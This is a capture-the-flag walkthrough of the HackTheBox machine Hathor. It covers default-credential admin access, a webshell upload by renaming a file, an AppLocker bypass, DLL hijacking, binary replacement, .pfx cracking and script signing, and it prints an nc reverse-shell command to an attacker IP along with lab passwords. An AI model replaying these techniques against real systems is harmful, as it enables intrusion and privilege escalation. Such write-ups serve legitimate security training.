Doing Sekhmet before this is super helpful, but still it is super hard. There are multiple different users we get shells as, and this writeup will divide them as follows instead of the usual.
Windcorp\web Shell
Nmap scan:
$ nmap -p- --min-rate 5000 10.129.71.218
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-11 11:28 EDT
Nmap scan report for 10.129.71.218
Host is up (0.0070s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49664/tcp open unknown
49668/tcp open unknown
49674/tcp open unknown
49696/tcp open unknown
49701/tcp open unknown
We can do a detailed scan for this because I don't want to miss anything from this machine.
$ sudo nmap -p 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389 -sC -sV -O --min-rate 3000 10.129.71.218
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-robots.txt: 29 disallowed entries (15 shown)
| /CaptchaImage.ashx* /Admin/ /App_Browsers/ /App_Code/
| /App_Data/ /App_Themes/ /bin/ /Blog/ViewCategory.aspx$
| /Blog/ViewArchive.aspx$ /Data/SiteImages/emoticons /MyPage.aspx
|_/MyPage.aspx$ /MyPage.aspx* /NeatHtml/ /NeatUpload/
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Home - mojoPortal
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-05-11 15:30:46Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: windcorp.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-05-11T15:32:09+00:00; -3s from scanner time.
| ssl-cert: Subject: commonName=hathor.windcorp.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:hathor.windcorp.htb
| Not valid before: 2022-03-18T07:51:40
|_Not valid after: 2023-03-18T07:51:40
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: windcorp.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=hathor.windcorp.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:hathor.windcorp.htb
| Not valid before: 2022-03-18T07:51:40
|_Not valid after: 2023-03-18T07:51:40
|_ssl-date: 2023-05-11T15:32:09+00:00; -3s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: windcorp.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=hathor.windcorp.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:hathor.windcorp.htb
| Not valid before: 2022-03-18T07:51:40
|_Not valid after: 2023-03-18T07:51:40
|_ssl-date: 2023-05-11T15:32:09+00:00; -3s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: windcorp.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=hathor.windcorp.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:hathor.windcorp.htb
| Not valid before: 2022-03-18T07:51:40
|_Not valid after: 2023-03-18T07:51:40
|_ssl-date: 2023-05-11T15:32:09+00:00; -3s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
The first thing we notice is the domain name, which is hathor.windcorp.htb. This has all the ports open, so it might be the DC itself. We can add the domain name to our /etc/hosts file.
Web Enum -> Default Creds
Port 80 shows a corporate page that is still under construction:
At the bottom of the page, there's a link that brings us to a login page on the website:
Viewing the page source reveals this is a mojoPortal instance:
A quick Google search for mojoPortal exploits and default credentials led to this:
Surprisingly, this worked!
Admin Panel -> Move RCE
The administrator panel lets us edit the pages and what is shown:
This is an IIS server, so uploading an .aspx reverse shell might work. Head to File Manager > Upload Files:
When trying to upload, it doesn't work.
If we change it to cmd.txt, it works.
Then it shows up here:
Interestingly, there's a Move function as well, and we can try moving this to be cmd.aspx.
We can try to rename it as cmd.aspx, and it seems to work:
Anyways, we can access our webshell using this CVE:
However, getting ANY shell fails to work. Similar to Sekhmet (which I actually solved before this), there's some kind of firewall in use here that is blocking us.
Firewall + AppLocker Enum
Since this was the first machine before Sekhmet which also had AppLocker, we can run some powershell enumeration to find out what exactly can be done:
This would generate a massive string of stuff that we can and cannot execute.
Here is what is allowed for files and binaries:
<FilePathRule Id="059bf360-e712-427a-8255-59d182bc4cd5" Name="%OSDRIVE%\share\scripts\7-zip64.dll" Description="" UserOrGroupSid="S-1-1-0" Action="Allow">
<FilePathRule Id="3a07aecc-17f3-43e5-911b-ddb7e4d7353f" Name="%OSDRIVE%\Get-bADpasswords\PSI\Psi_x64.dll" Description="" UserOrGroupSid="S-1-5-21-3783586571-2109290616-3725730865-10102" Action="Allow">
<AppLockerPolicy Version="1"><RuleCollection Type="Appx" EnforcementMode="Enabled"><FilePublisherRule Id="a9e18c21-ff8f-43cf-b9fc-db40eed693ba" Name="(Default Rule) All signed packaged apps" Description="Allows members of the Everyone group to run packaged apps that are signed." UserOrGroupSid="S-1-1-0" Action="Allow">
I don't think it's possible to replace these DLLs, and even if for some reason I have write access, I cannot restart these processes. Also, unsigned binaries like nc.exe won't run properly.
In this case, we can try some better webshells that don't rely on external binaries to run.
Insomnia shell is a fully implemented web shell that can give us a reverse shell without the use of external binaries. We can upload this one and try again.
Using this, we can get a reverse shell as web.
GinaWild Shell
Bad Passwords -> User Creds
Earlier, I saw some kind of Powershell script called Get-bADpasswords in use, so let's find that.
STATUS_NOT_SUPPORTED is an error that looks like it's going to be a reoccuring theme throughout this machine. A bit of research reveals that this is due to NTLM not being able to be used as an authentication method on this machine.
This means that only Kerberos tickets would work in trying to authenticate in this machine. For this case, we have to use kinit to get a ticket, similar to another machine Absolute. We need to include this within our /etc/krb5.conf file:
Then we can run kinit and give it the credentials we got earlier:
$ kinit BeatriceMill
Password for BeatriceMill@WINDCORP.HTB:
$ klist
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: BeatriceMill@WINDCORP.HTB
Valid starting Expires Service principal
05/11/2023 12:19:27 05/11/2023 22:19:27 krbtgt/WINDCORP.HTB@WINDCORP.HTB
renew until 05/12/2023 12:19:22
Great! Now we can finally view the shares:
$ smbclient -L //hathor.windcorp.htb -U BeatriceMill -N -k
WARNING: The option -k|--kerberos is deprecated!
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
share Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to hathor.windcorp.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
We can connect using smbclient.py.
$ impacket-smbclient -k 'windcorp.htb/BeatriceMill:!!!!ilovegood17@hathor.windcorp.htb'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] CCache file is not found. Skipping...
Type help for list of commands
# shares
ADMIN$
C$
IPC$
NETLOGON
share
SYSVOL
SMB Enumeration -> DLL Hijack
Within the share share, we can find some stuff:
# use share
# ls
drw-rw-rw- 0 Thu May 11 12:17:42 2023 .
drw-rw-rw- 0 Tue Apr 19 08:45:15 2022 ..
-rw-rw-rw- 1013928 Thu May 11 12:18:02 2023 AutoIt3_x64.exe
-rw-rw-rw- 4601208 Thu May 11 12:21:31 2023 Bginfo64.exe
drw-rw-rw- 0 Mon Mar 21 17:22:59 2022 scripts
# cd scripts
# ls
drw-rw-rw- 0 Mon Mar 21 17:22:59 2022 .
drw-rw-rw- 0 Thu May 11 12:17:42 2023 ..
-rw-rw-rw- 1076736 Thu May 11 12:22:41 2023 7-zip64.dll
-rw-rw-rw- 54739 Sun Jan 23 05:54:21 2022 7Zip.au3
-rw-rw-rw- 2333 Sun Jan 23 05:54:21 2022 ZipExample.zip
-rw-rw-rw- 1794 Sun Jan 23 05:54:21 2022 _7ZipAdd_Example.au3
-rw-rw-rw- 1855 Sun Jan 23 05:54:21 2022 _7ZipAdd_Example_using_Callback.au3
-rw-rw-rw- 334 Sun Jan 23 05:54:21 2022 _7ZipDelete_Example.au3
-rw-rw-rw- 859 Sun Jan 23 05:54:21 2022 _7ZIPExtractEx_Example.au3
-rw-rw-rw- 1867 Sun Jan 23 05:54:21 2022 _7ZIPExtractEx_Example_using_Callback.au3
-rw-rw-rw- 830 Sun Jan 23 05:54:21 2022 _7ZIPExtract_Example.au3
-rw-rw-rw- 2027 Sun Jan 23 05:54:21 2022 _7ZipFindFirst__7ZipFindNext_Example.au3
-rw-rw-rw- 372 Sun Jan 23 05:54:21 2022 _7ZIPUpdate_Example.au3
-rw-rw-rw- 886 Sun Jan 23 05:54:21 2022 _Archive_Size.au3
-rw-rw-rw- 201 Sun Jan 23 05:54:21 2022 _CheckExample.au3
-rw-rw-rw- 144 Sun Jan 23 05:54:21 2022 _GetZipListExample.au3
-rw-rw-rw- 498 Sun Jan 23 05:54:21 2022 _MiscExamples.au3
So that's where the 7-zip64.dll file is located. One of the things I noticed is that we can write to it. We can perform the DLL HIjacking attack for this. Because of AppLocker, I think that msfvenom generated DLLs won't work, so let's create our own.
I grabbed this script from Hacktricks, and we can build it within VS Code in our Windows machine. Afterwards, we can grab this DLL and place it within the share.
# put 7-zip64.dll
# ls
drw-rw-rw- 0 Mon Mar 21 17:22:59 2022 .
drw-rw-rw- 0 Thu May 11 22:57:42 2023 ..
-rw-rw-rw- 10240 Thu May 11 23:05:19 2023 7-zip64.dll
-rw-rw-rw- 54739 Sun Jan 23 05:54:21 2022 7Zip.au3
-rw-rw-rw- 2333 Sun Jan 23 05:54:21 2022 ZipExample.zip
-rw-rw-rw- 1794 Sun Jan 23 05:54:21 2022 _7ZipAdd_Example.au3
-rw-rw-rw- 1855 Sun Jan 23 05:54:21 2022 _7ZipAdd_Example_using_Callback.au3
-rw-rw-rw- 334 Sun Jan 23 05:54:21 2022 _7ZipDelete_Example.au3
-rw-rw-rw- 859 Sun Jan 23 05:54:21 2022 _7ZIPExtractEx_Example.au3
-rw-rw-rw- 1867 Sun Jan 23 05:54:21 2022 _7ZIPExtractEx_Example_using_Callback.au3
-rw-rw-rw- 830 Sun Jan 23 05:54:21 2022 _7ZIPExtract_Example.au3
-rw-rw-rw- 2027 Sun Jan 23 05:54:21 2022 _7ZipFindFirst__7ZipFindNext_Example.au3
-rw-rw-rw- 372 Sun Jan 23 05:54:21 2022 _7ZIPUpdate_Example.au3
-rw-rw-rw- 886 Sun Jan 23 05:54:21 2022 _Archive_Size.au3
-rw-rw-rw- 201 Sun Jan 23 05:54:21 2022 _CheckExample.au3
-rw-rw-rw- 144 Sun Jan 23 05:54:21 2022 _GetZipListExample.au3
-rw-rw-rw- 498 Sun Jan 23 05:54:21 2022 _MiscExamples.au3
Afterwards, we can wait for a bit then check the C:\Windows\Tasks folder. Eventually, I would see that it did create a file:
C:\Windows\Tasks>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE61-D5E0
Directory of C:\Windows\Tasks
05/12/2023 05:12 AM <DIR> .
04/19/2022 02:44 PM <DIR> ..
05/12/2023 05:12 AM 19 whoami.txt
1 File(s) 19 bytes
2 Dir(s) 9,334,525,952 bytes free
C:\Windows\Tasks>type whoami.txt
type whoami.txt
Access is denied.
I can't read it, meaning this is probably another user. There seems to be a really aggressive script that is cleaning this up every minute, because it wasn't long before this file disappeared. While waiting, I checked the AppLocker policy for the .exe files:
It seems that this file can be run regardless of what it is. Now that we have RCE as another user, let's try to enumerate who this user is and what they can do. Since the Bginfo64.exe file can be run, let's see if we can overwrite it with our own file like nc.exe.
After a while, it would create those files. Here's the interesting output:
C:\Users\Public>type whoami.txt
USER INFORMATION
----------------
User Name SID
================= ==============================================
windcorp\ginawild S-1-5-21-3783586571-2109290616-3725730865-2663
<TRUNCATED>
WINDCORP\ITDep Group S-1-5-21-3783586571-2109290616-3725730865-9601 Mandatory group, Enabled by default, Enabled group
C:\Users\Public>type icacls.txt
C:\share\Bginfo64.exe NT AUTHORITY\IUSR:(I)(N)
BUILTIN\IIS_IUSRS:(I)(N)
WINDCORP\web:(I)(N)
BUILTIN\Administrators:(I)(M,WO,DC)
NT AUTHORITY\SYSTEM:(I)(F)
WINDCORP\ITDep:(I)(RX,WO)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
It appears that the user is ginawild, and is part of the ITDep group. Also, this user has Write Owner privileges over the Bginfo64.exe file. This means we can take over as the owner of the file, replace it with nc.exe , change the permissions to let everyone execute it, and then execute it to gain a reverse shell as ginawild.
Before doing so, we need to get the file over. SMB wasn't going to work as something is closing our connection. powershell itself runs with very little allowance. So, let's re-use the file upload vulnerability we found earlier, and upload our nc64.exe shell to the website.
After waiting for a little bit, we will get a shell back!
We can now grab the user flag.
Bpassrunner Shell
Recycle Bin -> PFX Crack
Within the main C:\ directory, there are some files within the Recycle Bin.
c:\>dir /a
Volume in drive C has no label.
Volume Serial Number is BE61-D5E0
Directory of c:\
02/14/2022 08:48 PM <DIR> $Recycle.Bin
04/19/2022 02:24 PM <DIR> $WinREAgent
c:\$Recycle.Bin>dir /a
dir /a
Volume in drive C has no label.
Volume Serial Number is BE61-D5E0
Directory of c:\$Recycle.Bin
02/14/2022 08:48 PM <DIR> .
04/19/2022 02:45 PM <DIR> ..
02/14/2022 08:48 PM <DIR> S-1-5-18
10/07/2021 12:51 AM <DIR> S-1-5-21-3783586571-2109290616-3725730865-2359
10/13/2022 09:11 PM <DIR> S-1-5-21-3783586571-2109290616-3725730865-2663
10/13/2022 09:05 PM <DIR> S-1-5-21-3783586571-2109290616-3725730865-500
We can only access one of the directories, and it just has a bunch of .pfx files.
c:\$Recycle.Bin\S-1-5-21-3783586571-2109290616-3725730865-2663>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE61-D5E0
Directory of c:\$Recycle.Bin\S-1-5-21-3783586571-2109290616-3725730865-2663
10/12/2022 09:26 PM 98 $IZIX7VV.pfx
03/21/2022 04:37 PM 4,053 $RLYS3KF.pfx
10/12/2022 08:43 PM 4,280 $RZIX7VV.pfx
To transfer the files, we can copy them over to the C:\share directory and download them from SMB. All 3 files are data:
$ file *.pfx
$IZIX7VV.pfx: data
$RLYS3KF.pfx: data
$RZIX7VV.pfx: data
Since all 3 are pfx, let's try to use pfx2john to crack them. We would be able to find one of the passwords:
$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 128/128 AVX 4x])
Loaded hashes with cost 1 (iteration count) varying from 2000 to 2048
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
abceasyas123 ($RLYS3KF.pfx)
Now we can use openssl to read more information about this:
So this is from the Administrator. Since we have a .pfx from the administrator, we can actually use this. In the AppLocker conditions, we can see the subject match some conditions:
This means that we can run 'any program' if we import this into the Certificate Store of the machine. The question is, what script do we run?
Script Hijack -> Shell
I was still curious about the Get-bADpasswords.ps1 script, what was the point of it? I checked the ACLs of it, and found that I could overwrite it:
c:\Get-bADpasswords>icacls Get-bADpasswords.ps1
icacls Get-bADpasswords.ps1
Get-bADpasswords.ps1 WINDCORP\ITDep:(I)(M)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
We have Modify Access to this file. So in this case, we can replace it with our own AND then sign it using the certificate. I downloaded it, and made a small edit at the top to use our Bginfo64.exe file (which is still nc.exe) to gain another reverse shell.
C:\share\Bginfo64.exe -e cmd.exe 10.10.14.13 5555
Afterwards, we can re-upload this to SMB and use copy to overwrite the existing script. Now, we need to sign the script.